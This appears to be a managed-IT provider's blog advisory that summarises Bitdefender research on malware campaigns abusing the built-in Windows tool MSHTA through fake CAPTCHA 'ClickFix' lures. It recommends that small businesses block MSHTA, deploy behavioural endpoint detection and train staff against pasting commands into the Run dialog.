Bitdefender researchers this week disclosed a sharp rise in attacks abusing MSHTA — a Microsoft-signed Windows utility that has been sitting on every Windows PC since 1999 — to silently install password stealers, loaders, and backdoors. Because mshta.exe is a trusted, built-in component of Windows, the malicious activity blends into normal system behavior and routinely slips past antivirus. For small businesses, this is the kind of attack your team can trigger with a single bad click on a fake CAPTCHA or a 'free software' download.
What MSHTA is, and why attackers love it
MSHTA (Microsoft HTML Application Host) is a legacy Windows utility tied to the old Internet Explorer era that can execute VBScript and JavaScript from local or remote files. It has been part of Windows since 1999 with the release of Windows 98 SE and Internet Explorer 5.0, and has remained part of Windows throughout, including the latest current releases.
The problem is that legitimate use has cratered while attacker use has exploded. Bitdefender Labs reports a notable rise in detections involving mshta.exe over recent months, suggesting that attackers are increasingly relying on the LOLBIN as legitimate enterprise use steadily declines. Because the binary is Microsoft-signed and trusted by many security products and enterprise environments, attackers use it to blend malicious activity with legitimate system operations. Bitdefender says the tool is especially attractive because it can retrieve remote payloads, execute scripts in memory, and hand off execution to PowerShell or other Windows components without dropping obvious malware files onto disk.
In plain English: attackers don't need to smuggle a malware file past your antivirus. They use a tool Microsoft already shipped you.
The 'ClickFix' lure your employees will actually fall for
Most of these campaigns start with social engineering, not an exploit. In the campaigns Bitdefender reviewed, social engineering was a common entry point. Users were lured through fake software downloads, phishing links, Discord messages, ClickFix-style prompts, search-engine manipulation and fake human verification pages that encouraged them to copy and run malicious commands.
Here's the kicker — the ClickFix trick. Threat actors ran Emmenhtal Loader campaigns that abused fake CAPTCHA verification pages distributed through Discord phishing messages. Victims were tricked into copying malicious commands into the Windows Run dialog under the pretext of "prove you are human". MSHTA executed obfuscated HTA payloads in memory before launching PowerShell to fetch additional malware, ultimately delivering LummaStealer in one analyzed case.
An employee searches for a free PDF tool, lands on a fake page, is told to press Windows+R and paste a command to "verify they're human," and the workstation is silently compromised. No file downloaded. No antivirus alert.
What's actually being installed
The payloads matter because they translate directly into business risk. Bitdefender linked the tool to campaigns involving malware families including LummaStealer, Amatera, CountLoader, Emmenhtal Loader, ClipBanker and PurpleFox.
LummaStealer and Amatera are credential and browser-data thieves — meaning saved passwords, session cookies, and banking logins. Bitdefender also documented MSHTA abuse in ClipBanker campaigns targeting cryptocurrency users. In those attacks, remote HTA scripts launched hidden PowerShell commands that downloaded secondary payloads designed to establish persistence, disable defenses, and replace cryptocurrency wallet addresses copied to the clipboard. PurpleFox goes deeper: researchers observed PurpleFox operators using MSHTA to launch msiexec commands that downloaded MSI installers disguised as PNG image files. Once installed, PurpleFox deployed a rootkit-enabled backdoor capable of persistence, remote command execution, information theft, and DDoS functionality.
What your managed-IT provider should be doing this week
There are concrete, MSP-level actions that shut this attack class down — and most SMBs don't have them in place by default. Disable MSHTA if not required for business operations and block HTA file execution using Group Policy or application control.
The broader playbook your provider should already be running, as part of our managed IT services lineup:
- Restrict or fully block mshta.exe and wscript.exe via application allow-listing on workstations that don't need them. - Deploy endpoint detection that watches behavior, not just file signatures. Security strategies must go beyond signature-based detection and focus on behavioral monitoring, least privilege, and proactive hardening.
- Train staff specifically on the ClickFix lure — any prompt that asks an employee to paste a command into the Windows Run dialog is hostile, full stop. - Lock down what gets installed. Most ClickFix infections start with someone hunting for "free" software.
Use endpoint security solutions capable of monitoring behavioral anomalies, script execution patterns, and in-memory activity. If your current IT provider can't tell you whether mshta.exe is restricted on your fleet, that's the conversation to have this week.
What York Businesses Should Do
Most York County small businesses we talk to have never heard of MSHTA — and that's exactly the point. If you run Windows at your office, your team can trigger this attack today with a single bad click. York Computer can audit your endpoints for unnecessary legacy Windows tools and lock them down before someone in accounting copy-pastes a 'CAPTCHA verification' into the Run box.
Sources
- Legacy Windows Tool MSHTA Fuels Surge in Silent Malware Attacks — SecurityWeek
- Microsoft's MSHTA Legacy Tool Still Powers Malware Campaigns on Windows — Bitdefender Labs
- Microsoft's legacy MSHTA tool heavily abused in malware attacks — CyberInsider
- Internet Explorer may be dead, but its ghost still runs malware — CSO Online
- MSHTA abuse helps malware hide in Windows processes — SecurityBrief